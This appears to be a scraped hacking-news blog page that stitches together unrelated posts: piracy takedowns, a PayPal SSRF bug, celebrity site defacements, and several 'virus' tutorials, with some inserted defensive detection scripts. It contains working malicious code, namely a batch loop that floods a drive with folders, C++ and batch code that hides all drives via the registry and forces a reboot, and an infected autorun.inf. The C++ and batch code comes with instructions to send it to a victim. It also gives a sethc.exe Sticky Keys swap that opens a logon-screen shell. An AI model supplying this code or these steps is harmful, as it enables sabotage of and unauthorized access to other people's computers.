Google asked to censor 2 million PirateBay URLs

In the first week of April, Google reported over 40 thousand takedown requests for URLs hosted on the torrent site.
In a bid to make it more difficult for the public to find pirated content, copyright holders have turned to Google to delete or block around two million links to various copyrighted content hosted on thepiratebay.se. The torrent site itself does not take any takedown requests.

The number of thepiratebay.se URLs that have been submitted to Google reached the two million mark this week. The links that were submitted have either been removed or can no longer be accessed through search results.

The Google Transparency Report shows that the total number of URLs requested for removal on The Pirate Bay reached 2,003,331 (at the time of writing this article).

Despite featuring in the list, The Pirate Bay is not the biggest offender even though it is the most popular. Filestube.com takes the top spot while Pirate Bay is 29th. Filestube accounts for almost 11 million URLs that have been requested for takedown. dilandau.eu, rapidgator.net, zippyshare.com, 4shared.com and many others are the most reported sites.

According to Google, the two million URLs represent between one and five percent of all the links that are indexed. This means that lots of other content from the torrent site is still available via Google. The Pirate Bay is unmoved by the development and despite the high number of takedown requests, the traffic of the site has been increasing steadily over the years.

Critical SSRF vulnerability in Paypal’s subsidiary allows to access Internal Network

Shubham Shah, a web application pentester from Australia, has discovered a critical Server Side Request Forgery (SSRF) vulnerability in the Bill Me Later website, a subsidiary of Paypal. The vulnerability exists in the subdomain merchants.billmelater.com.

“The vulnerability itself was found within a test bed for BillMeLater’s SOAP API, which allowed for queries to be made to any given host URL,” the researcher explained in his blog post.

An attacker is able to send requests to any internal network through the API and get the response. Some internal admin pages allowed him to query internal databases without asking for any login credentials.

The researcher says that successful exploitation may result in compromise of customers' data.

The bug was reported to Paypal in October 2013, and he received a reward from them in Jan. 2014.

Paypal has partially fixed the bug by restricting the SOAP API from accessing the internal servers. However, the researcher says that it still acts as a proxy to view other hosts.

If you would like to know more details about the SSRF vulnerability and how it can be exploited for port scanning or internal network discovery, you can refer to the Riyaz Walikar blog post and this document.
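An added example, not code from the researcher's post or from Paypal: one way to close both problems described above (reaching internal servers, and acting as a proxy to arbitrary other hosts) is to check the destination against an allow-list and then check every address it resolves to. The host name `api.partner.example`, the function names and the injectable resolver are assumptions made for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical allow-list: the only hosts this service is meant to call.
ALLOWED_HOSTS = {"api.partner.example"}

def resolve(host):
    """Default resolver: every address the name currently maps to."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def check_destination(url, resolver=resolve):
    """Return (allowed, reason) for a user-supplied endpoint URL."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = (parts.hostname or "").lower()
    # Allow-list first: this stops the "proxy to other hosts" case that a
    # block-list of internal ranges alone leaves open.
    if host not in ALLOWED_HOSTS:
        return False, "host not on allow-list"
    # Then make sure the allowed name does not point at an internal address.
    for addr in resolver(host):
        ip = ipaddress.ip_address(addr)
        if not ip.is_global:
            return False, f"resolves to non-public address {ip}"
    return True, "ok"

if __name__ == "__main__":
    # Constructed inputs; the lambda stands in for DNS so this runs offline.
    fake_dns = lambda host: {"8.8.8.8"}
    for candidate in ("https://api.partner.example/soap",
                      "http://10.0.0.5/admin",
                      "http://example.org/"):
        print(candidate, check_destination(candidate, fake_dns))
```

The HTTP client has to connect to the address that passed the check and re-run the check on every redirect; otherwise a second DNS answer or a 3xx response can still steer the request inward.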

– See more at: http://www.ehackingnews.com/2014/03/critical-ssrf-vulnerability-in-paypals.html

Miley Cyrus, Taylor Swift and Britney Spears websites hacked by Ethical Spectrum

Update:
The latest tweet from the hacker shows he compromised the database containing username and password details belonging to these websites: “The database of #MileyCyrus, #SelenaGomez……etc with 2,5 million users and pass is for sell, anyone interested email me at my mail”

Exclusive Information:
The hacker told E Hacking News that he found multiple vulnerabilities in the Groundctrl website and gained access to the database server.

He also gained access to the CMS panel which manages the celebrities’ websites.

GroundCtrl CMS Panel

Original Article:

A hacker going by the online handle “Ethical Spectrum” has hacked into websites belonging to several celebrities and defaced the sites.

The affected websites include Miley Cyrus's official site (mileycyrus.com), Selena Gomez's site (selenagomez.com), Taylor Swift's site (taylorswift.com) and Britney Spears's site (britneyspears.com).

We are able to confirm that these are the official websites of the celebrities, as they are linked from their Twitter accounts.

According to the hacker's Twitter account (@Eth_Spectrum), he hacked into the above-mentioned websites on March 8th. The websites were restored after the breach. However, the hacker mentioned that he once again managed to deface them.

Other websites attacked by the hacker are Ground Ctrl (groundctrl.com), mypinkfriday.com, Chelsea Handler's site (chelseahandler.com), Aaron Lewis (aaronlewismusic.com), therealcocojones.com, christinagrimmieofficial.com and Kacey Musgraves (kaceymusgraves.com).

The defacement just reads “Why i hacked this site, you can ask this person greg.patterson@groundctrl.com”.

Greg Patterson is the co-founder of Groundctrl, an organization that builds websites for artists. It appears the security breach started from Groundctrl.

Other affected sites:

  • Pat Green (patgreen.com)
  • Rob Thomas (robthomasmusic.com)
  • Rock Mafia (rockmafia.com)
  • ritawilson.com
  • sum41.com
  • nickcarter.net
  • jordanknight.com

If you are not able to see the defacement, you can find the mirror here:
http://www.zone-h.org/archive/notifier=Ethical%20Spectrum

All of the affected websites are currently showing a maintenance error message, except the official Groundctrl website.

The hacker didn’t provide much information about the breach, so we are not sure exactly how he hacked into all of these websites: whether he found a zero-day exploit in the CMS developed by Groundctrl, or whether all of the affected sites are managed in a central place.

– See more at: http://www.ehackingnews.com/2014/03/miley-cyrus-taylor-swift-and-britney.html

How to execute a Virus

TO EXECUTE THE VIRUS AUTORUN.INF FILE IS USED

This article gives you complete details about the autorun.inf file.
These are the instructions saved in an infected autorun.inf file (one that calls virus programs):

[Autorun]
Open=RECYCLER\QqFvXcB.exe
Explore=RECYCLER\QqFvXcB.exe
AutoPlay=RECYCLER\QqFvXcB.exe
shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Is autorun.inf a virus file? No. Then why does antivirus software block autorun.inf files? Read on for the full details about the autorun file.

Introduction to Autorun.inf File:
Autorun.inf is a file that triggers other programs, documents or other files to be opened when a CD or pen drive is inserted. It simply triggers them.

When a CD or pen drive is inserted, Windows searches for the autorun.inf file and follows the instructions written inside it.

How to create an Autorun file?
Open Notepad.
Type this command:

[Autorun]

Save the file as “autorun.inf” (select “All files” as the file type, not text).

Complete syntax and instructions inside the Autorun file:
The basic syntax that must be inside the autorun.inf file is:

[Autorun]

This is used to identify the file as an autorun file.

OPEN=
This specifies which application should be opened when the CD or pen drive is opened.

Example:

open=virus.exe

This will launch the virus.exe file when the CD or pen drive is opened. The file should be in the root directory.
If the file is in a subdirectory, then we have to specify it:

Open=RECYCLER\Virus.exe

Explore=
There is no big difference. This command is run if you right-click the CD or pen drive and select the Explore option.

AutoPlay=
Same as the above, but it launches the program when the drive is auto-played.

SHELL\VERB =

The SHELL\VERB command adds a custom command to the drive’s shortcut menu. This custom command can for example be used to launch an application on the CD/DVD.

Example:

shell\Open\Command=RECYCLER\QqFvXcB.exe
shell\Open\Default=1
shell\Explore\command=RECYCLER\QqFvXcB.exe
shell\Autoplay\Command=RECYCLER\QqFvXcB.exe

Use a series of shell commands to specify one or more entries in the pop-up menu that appears when the user right-clicks on the CD icon. (The shell entries supplement the open command.)

Icon=
Changes the icon of your pen drive or CD. You can use .ico or .bmp images (also .exe and .dll files).

Example:

icon=breakthesecurity.ico

Label=

Specifies a text label to be displayed for this CD in Explorer.
Note that using the LABEL option can lead to problems displaying the selected ICON under Windows XP.

Example:

Label=Ethical hacking



Why does antivirus software block the autorun.inf file?
From the above, you know that the autorun.inf file is not a virus. But why does antivirus software block it? Because, as I said, the autorun file can call or launch any application or exe file, which can lead to a virus attack. If autorun.inf is blocked, then there is no way to launch the virus code.

Autorun is not a virus, but it can call virus files.
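A triage check for the directives described above, as an added example that is not part of the original article: it parses the [Autorun] section and flags launch keys whose target is an executable or sits inside a recycle-bin style folder, as in the infected file shown at the top. The key list, the folder list and the function names are assumptions of this example.

```python
import re

# Launch keys the article lists, plus ShellExecute, another launch key
# that Windows has honoured in autorun.inf.
LAUNCH_KEYS = re.compile(r"^(open|explore|autoplay|shellexecute|shell\\[^\\]+\\command)$", re.I)
EXECUTABLE = re.compile(r"\.(exe|com|scr|pif|bat|cmd|vbs|js|dll)\b", re.I)
# Hidden system folders: an unusual place for a program on removable media.
ODD_FOLDERS = re.compile(r"^(recycler|recycled|\$recycle\.bin|system volume information)[\\/]", re.I)

def parse_autorun(text):
    """Return {lowercased key: value} for the [autorun] section only."""
    entries, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "autorun"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip().strip('"')
    return entries

def triage(text):
    """Return [(key, target, reasons)] for suspicious launch directives."""
    findings = []
    for key, target in parse_autorun(text).items():
        if not LAUNCH_KEYS.match(key):
            continue
        reasons = []
        if EXECUTABLE.search(target):
            reasons.append("launches executable")
        if ODD_FOLDERS.match(target):
            reasons.append("target inside recycle/system folder")
        if reasons:
            findings.append((key, target, reasons))
    return findings

# Constructed samples: part of the article's infected file, and a harmless one.
INFECTED = ("[Autorun]\nOpen=RECYCLER\\QqFvXcB.exe\n"
            "shell\\Open\\Command=RECYCLER\\QqFvXcB.exe\nshell\\Open\\Default=1\n")
BENIGN = "[Autorun]\nicon=breakthesecurity.ico\nLabel=Ethical hacking\n"

if __name__ == "__main__":
    for key, target, reasons in triage(INFECTED):
        print(f"{key} -> {target}: {', '.join(reasons)}")
```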

Create a virus to create a infinite folder in a drive

this batch code will very helpful for you.  This is simple and effective virus code.

As usual open notepad.
Copy this code to Notepad.

@echo off
:top
md %random%
goto top
 @echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top , infinite loop

Save the file with .bat extension(for eg: folderscreate.bat)

That’s all if you double click the file it will create a finite folder wherever the batch file is.

C++ ,Batch Virus code to disable All Hard disk

Hi friends,here i give you give the C++ virus code.  Actually Batch code is converted to C++ virus code.  If you like you can use it as batch code also.

C++ Virus Code :

#include < windows.h >
#include < fstream.h >
#include < iostream.h >
#include < string.h >
#include < conio.h >
int main()
{
ofstream write ( “C:\\WINDOWS\\system32\\HackingStar.bat” ); /*opening or creating new file with .bat extension*/

write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n”; write << “REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n”; write<<“shutdown -r -c \”Sorry Your System is hacked by us!\” -f”<<“\n”; write.close(); //close file ShellExecute(NULL,”open”,”C:\\WINDOWS\\system32\\HackingStar.bat “,NULL,NULL,SW_SHOWNORMAL); return 0; }

Copy the above code and paste in notepad
Save the file with .cpp extension
Compile and create .exe file in cpp
Note:
Don’t run this c++ program ,it will attack your system itself.
Copy the created .exe file and send it to your victim. You can also attach it with any other
exe files.

Batch Virus Code Creation:

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoDrives /t REG_DWORD /d 12\n

REG ADD HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVer sion\\policies\\Explorer /v NoViewonDrive /t REG_DWORD /d 12\n

shutdown -r -c \”Sorry Your System is hacked by us!\” -f

I think this code will simple for non c++ programmers. It is easy to create the batch file also.
Copy the above code to notepad.
Save it with .bat extension (for ex: nodrivevirus.bat)
Send the file to your victim

New XSS Cheat Sheet – Bypassing Modern Web Application Firewall XSS Filters

While doing web application penetration testing for our clients, we sometimes have to face a web application firewall (WAF) that blocks every malicious request/payload.

There are some cheat sheets available on the internet that helped to bypass WAFs in the past. However, those cheats won’t work with modern WAFs and the latest browsers.

So, there is a need for a new cheat sheet.

One of the top security researchers, Rafay Baloch, has done an excellent job by organizing his own techniques to bypass modern WAFs and has published a white paper on them.

The paper titled “Modern Web Application Firewalls Fingerprinting and Bypassing XSS Filters” covers only the techniques needed for bypassing XSS filters.

Rafay promised to cover bypass techniques for other vulnerabilities in his next paper.

You can download the white paper from here.

Two Information Technology (IT) students hack InfoSys to recharge mobile phones worth Rs.8 Lakh

Two Information Technology (IT) students have been arrested by Jaipur cyber crime police for hacking the Data InfoSys e-processing system and fraudulently recharging BSNL mobile phones.

Kulshrestha Varma and Hardik Sud, both 19 years old and students of APG University in Shimla, managed to recharge more than 500 mobile phones, causing a loss of Rs.8 Lakh to Data InfoSys.

According to the Times of India, the students used a public Internet cafe to breach the Data InfoSys website. These two kids might have thought that the police couldn't catch them if they used a cyber cafe.

The company became aware of the fraudulent recharges at the end of last year and filed a complaint at the cyber police station on December 3rd. Police took 75 days to crack the case.

Police have arrested them and brought them to Jaipur on a transit remand. The police suspect the involvement of several other people in this cyber crime.

Thousands of websites infected via Vulnerability in WordPress Optimize Press Theme

A file upload vulnerability in the OptimizePress theme allowed attackers to infect thousands of WordPress websites, reports Sucuri. The vulnerable file is “lib/admin/media-upload.php”, which allows anyone to upload any kind of file to the “wp-content/uploads/optpress/images_comingsoon” folder.
The Sucuri team has detected that more than 2,000 websites using the OptimizePress theme have been compromised. All of the compromised sites have been injected with an iFrame pointing to the same malicious domain. Almost 75% of the infected websites have already been blacklisted by Google Safe Browsing. If you are using the above theme, you are urged to immediately upgrade to the latest version. Otherwise, you will soon find yourself victim to malware infection.

Restore Windows 7 password through Sticky Keys

You can do this by using Windows RE. You can start Windows RE by booting the Windows Vista or Windows 7 setup DVD and then selecting “Repair” instead of “Install Windows.”

By the way, you can’t use the Windows XP boot CD for this purpose because its Recovery Console will ask for a password for the offline installation. However, you can use a Vista or Windows 7 DVD to reset a Windows administrator password on Windows XP.

This works because Windows RE, which is based on Vista or Windows 7, will let you launch a command prompt with access to an offline installation without requiring a password.

To reset the administrator password, follow these steps:

  1. Boot from Windows RE and access the command prompt.
  2. Find the drive letter of the partition where Windows is installed. In Vista and Windows XP, it is usually C:, in Windows 7, it is D: in most cases because the first partition contains Startup Repair. To find the drive letter, type C: (or D:, respectively) and search for the Windows folder. Note that Windows PE (RE) usually resides on X:.
  3. Type the following command (replace “c:” with the correct drive letter if Windows is not located on C:):
     copy c:\windows\system32\sethc.exe c:\
     This creates a copy of sethc.exe to restore later.
  4. Type this command to replace sethc.exe with cmd.exe:
     copy /y c:\windows\system32\cmd.exe c:\windows\system32\sethc.exe
  5. Reboot your computer and start the Windows installation where you forgot the administrator password.
  6. After you see the logon screen, press the SHIFT key five times.
  7. You should see a command prompt where you can enter the following command to reset the Windows password (see screenshot above):
     net user your_user_name new_password
     If you don’t know your user name, just type net user to list the available user names.
  8. You can now log on with the new password.

I recommend that you replace sethc.exe with the copy you stored in the root folder of your system drive in step 3. For this, you have to boot up again with Windows PE or RE because you can’t replace system files while the Windows installation is online. Then you have to enter this command: copy /y c:\sethc.exe c:\windows\system32\sethc.exe
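A defender-side check for the swap described above, as an added example that is not part of the original article: it hashes the logon-screen accessibility binaries in a System32-style directory and reports any that are byte-identical to a command shell, and it lists the backup copy that the procedure leaves in the drive root. The binaries other than sethc.exe and the function names are assumptions of this example.

```python
import hashlib
from pathlib import Path

# Binaries that can be started from the logon screen. The article swaps
# sethc.exe; the other names are assumptions added for wider coverage.
ACCESSIBILITY = ["sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe"]
# Shells, relative to System32, that none of the above should be a copy of.
SHELLS = ["cmd.exe", "WindowsPowerShell/v1.0/powershell.exe"]

def sha256(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def find_swapped(system32):
    """Return [(binary, shell)] for accessibility binaries identical to a shell."""
    root = Path(system32)
    shell_hashes = {sha256(root / s): s for s in SHELLS if (root / s).is_file()}
    hits = []
    for name in ACCESSIBILITY:
        candidate = root / name
        if candidate.is_file():
            shell = shell_hashes.get(sha256(candidate))
            if shell:
                hits.append((name, shell))
    return hits

def leftover_backups(drive_root):
    """Accessibility binaries sitting in the drive root, where the article's
    procedure parks the original sethc.exe before overwriting it."""
    root = Path(drive_root)
    return [n for n in ACCESSIBILITY if (root / n).is_file()]

if __name__ == "__main__":
    import sys
    drive = sys.argv[1] if len(sys.argv) > 1 else "C:/"
    for binary, shell in find_swapped(Path(drive) / "Windows" / "System32"):
        print(f"ALERT: {binary} is byte-identical to {shell}")
    for name in leftover_backups(drive):
        print(f"NOTE: {name} found in {drive} (possible backup of a replaced binary)")
```

Run it against a mounted offline image or the live system drive; a hit from `find_swapped` means SHIFT pressed five times at the logon screen opens a shell instead of Sticky Keys.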